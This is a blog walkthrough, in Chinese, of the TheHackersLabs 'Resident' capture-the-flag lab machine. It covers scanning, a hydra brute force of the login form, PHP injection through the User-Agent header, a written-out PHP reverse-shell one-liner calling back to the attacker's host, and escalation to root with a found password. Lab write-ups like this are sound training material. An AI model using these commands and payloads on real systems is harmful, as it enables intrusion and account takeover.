Pepster'Blog
TheHackersLabs-Resident-Walkthrough
城南花已开 Lv6
  2025-01-24 15:10:00   2025-04-28 15:09:13    1.5k 字  8 分钟  22

信息收集

服务探测

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.164  08:00:27:5e:70:f7       (Unknown)
192.168.60.254  00:50:56:f9:b3:de       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.965 seconds (130.28 hosts/sec). 4 responded
export ip=192.168.60.164
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: allowing you to send UDP packets into the void 1200x faster than NMAP

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.164:22
Open 192.168.60.164:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 15:08 CST
Initiating ARP Ping Scan at 15:08
Scanning 192.168.60.164 [1 port]
Completed ARP Ping Scan at 15:08, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:08
Completed Parallel DNS resolution of 1 host. at 15:08, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:08
Scanning 192.168.60.164 [2 ports]
Discovered open port 80/tcp on 192.168.60.164
Discovered open port 22/tcp on 192.168.60.164
Completed SYN Stealth Scan at 15:08, 0.07s elapsed (2 total ports)
Nmap scan report for 192.168.60.164
Host is up, received arp-response (0.00033s latency).
Scanned at 2025-01-24 15:08:22 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:5E:70:F7 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

浏览器访问80端口,是个登入表单

image

我尝试弱口令登入,无效

扫一下文件目录

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.164
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/connect.php          (Status: 200) [Size: 1]
/dashboard.php        (Status: 302) [Size: 0] [--> index.php]
/index.php            (Status: 200) [Size: 2284]
/index.php            (Status: 200) [Size: 2284]
/info.php             (Status: 200) [Size: 79476]
/info.php             (Status: 200) [Size: 79477]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.60.164/javascript/]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/robots.txt           (Status: 200) [Size: 144]
/robots.txt           (Status: 200) [Size: 144]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

31位md5值

robots中找到提示信息

BASH 
1
2
3
4
5
❯ curl http://$ip/robots.txt
Users admin

Pass JTM1JTYxJTMwJTM2JTMxJTM1JTMzJTYyJTMxJTMyJTYyJTMyJTY1JTYzJTM2JTMyJTMxJTMwJTYxJTM4JTYyJTYyJTM2JTM2JTY2JTM0JTY1JTM3JTM4JTYzJTM0

密码可能是某种加密,我丢到cyberchef自动解密一下,得到一串密文5a06153b12b2ec6210a8bb66f4e78c4

image

不过还是登入不上,参考了其他师傅的WP,得知md5最后少一位

正常md5是32位的

我们尝试生成一下字典

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
for i in {a..z} {0..9};do echo 5a06153b12b2ec6210a8bb66f4e78c4$i>>pass.txt;done
cat pass.txt
5a06153b12b2ec6210a8bb66f4e78c4a
5a06153b12b2ec6210a8bb66f4e78c4b
5a06153b12b2ec6210a8bb66f4e78c4c
5a06153b12b2ec6210a8bb66f4e78c4d
5a06153b12b2ec6210a8bb66f4e78c4e
5a06153b12b2ec6210a8bb66f4e78c4f
5a06153b12b2ec6210a8bb66f4e78c4g
5a06153b12b2ec6210a8bb66f4e78c4h
5a06153b12b2ec6210a8bb66f4e78c4i
5a06153b12b2ec6210a8bb66f4e78c4j
5a06153b12b2ec6210a8bb66f4e78c4k
5a06153b12b2ec6210a8bb66f4e78c4l
5a06153b12b2ec6210a8bb66f4e78c4m
5a06153b12b2ec6210a8bb66f4e78c4n
5a06153b12b2ec6210a8bb66f4e78c4o
5a06153b12b2ec6210a8bb66f4e78c4p
5a06153b12b2ec6210a8bb66f4e78c4q
5a06153b12b2ec6210a8bb66f4e78c4r
5a06153b12b2ec6210a8bb66f4e78c4s
5a06153b12b2ec6210a8bb66f4e78c4t
5a06153b12b2ec6210a8bb66f4e78c4u
5a06153b12b2ec6210a8bb66f4e78c4v
5a06153b12b2ec6210a8bb66f4e78c4w
5a06153b12b2ec6210a8bb66f4e78c4x
5a06153b12b2ec6210a8bb66f4e78c4y
5a06153b12b2ec6210a8bb66f4e78c4z
5a06153b12b2ec6210a8bb66f4e78c40
5a06153b12b2ec6210a8bb66f4e78c41
5a06153b12b2ec6210a8bb66f4e78c42
5a06153b12b2ec6210a8bb66f4e78c43
5a06153b12b2ec6210a8bb66f4e78c44
5a06153b12b2ec6210a8bb66f4e78c45
5a06153b12b2ec6210a8bb66f4e78c46
5a06153b12b2ec6210a8bb66f4e78c47
5a06153b12b2ec6210a8bb66f4e78c48
5a06153b12b2ec6210a8bb66f4e78c49

使用hydra爆破一下登录表单

BASH 
1
2
3
4
5
6
7
8
9
10
❯ hydra -l admin -P pass.txt $ip http-post-form "/index.php:username=^USER^&password=^PASS^:F=incorrectos"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-24 15:41:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 36 login tries (l:1/p:36), ~3 tries per task
[DATA] attacking http-post-form://192.168.60.164:80/index.php:username=^USER^&password=^PASS^:F=incorrectos
[80][http-post-form] host: 192.168.60.164   login: admin   password: 5a06153b12b2ec6210a8bb66f4e78c4a
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-24 15:41:51

得到密码 5a06153b12b2ec6210a8bb66f4e78c4a

进入之后可以打印消息,我尝试了命令注入,无效

image

但是可以进行xss注入

image

image

SSRF

还有下面的请求功能,可能含有SSRF漏洞

image

你可以拿到用户名之后直接ssh爆破得到ram的密码为fuckyou

也可以在用户代理中注入php代码执行,拿到反弹shell

image

我尝试利用nc反弹shell不行

我多次尝试发现利用php proc_open可以弹回来shell,不会中断

<?php $sock=fsockopen("192.168.60.100",4444);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>

用户提权

BASH 
1
2
3
4
5
6
7
❯ pwncat-cs -lp 4444
[16:15:49] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[16:16:11] received connection from 192.168.60.164:43270                                                                                    bind.py:84
[16:16:12] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash                                                                  manager.py:957
[16:16:13] 192.168.60.164:43270: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) www-data@TheHackersLabs-Resident:/var/www/html$

发现有ram simple用户,其中ram用户很多文件都是可读的

拿到user flag了,还有其他信息

有个ram的密码hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
(remote) www-data@TheHackersLabs-Resident:/var/www$ cat /etc/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
simple:x:1000:1000:simple,,,:/home/simple:/bin/bash
ram:x:1001:1001::/home/ram:/bin/bash
(remote) www-data@TheHackersLabs-Resident:/home/ram$ ls -al
total 44
drwxr-xr-x 3 ram  ram  4096 Oct  8 10:58 .
drwxr-xr-x 4 root root 4096 Oct  7 12:45 ..
-rw------- 1 ram  ram     0 Oct  8 10:58 .bash_history
-rw-r--r-- 1 ram  ram   220 Mar 29  2024 .bash_logout
-rw-r--r-- 1 ram  ram  3526 Mar 29  2024 .bashrc
-rw-r--r-- 1 ram  ram  5290 Jul 12  2023 .face
lrwxrwxrwx 1 ram  ram     5 Jul 12  2023 .face.icon -> .face
drwxr-xr-x 3 ram  ram  4096 Oct  7 12:46 .local
-rw-r--r-- 1 ram  ram   807 Mar 29  2024 .profile
-rw-r--r-- 1 ram  ram    97 Oct  7 13:31 password.txt
-rw-r--r-- 1 root root   11 Oct  8 10:57 root.txt
-rw-r--r-- 1 ram  ram    41 Oct  7 13:39 user.txt
(remote) www-data@TheHackersLabs-Resident:/home/ram$ cat *.txt
ram:$y$j9T$v3fiA7W1LOJmdyVZGUfIp0$TF7qqhsJ1SnWH8caDijOlxCjIo2VXgurTgq6DIlxmE1:20003:0:99999:7:::
macbookpro
70ff9f33926b1865edde645073a37bd1fffba984

那既然我都可以读user文件了,我还登入用户干嘛

Root提权

猜测macbookpro就是root的密码

直接登入上去了

BASH 
1
2
3
4
5
6
(remote) www-data@TheHackersLabs-Resident:/home/ram$ su root
Password:
root@TheHackersLabs-Resident:/home/ram# cd ~
root@TheHackersLabs-Resident:~# cat root.txt
53175bcc0524f37b47062fafdda28e3f8eb91d519ca0a184ca71bbebe72f969a

不是,这啥啊⁉️这靶机有点辣鸡哇

  1. 信息收集
    1. 服务探测
    2. 31位md5值
    3. SSRF
  2. 用户提权
  3. Root提权
  1. 信息收集
    1. 服务探测
    2. 31位md5值
    3. SSRF
  2. 用户提权
  3. Root提权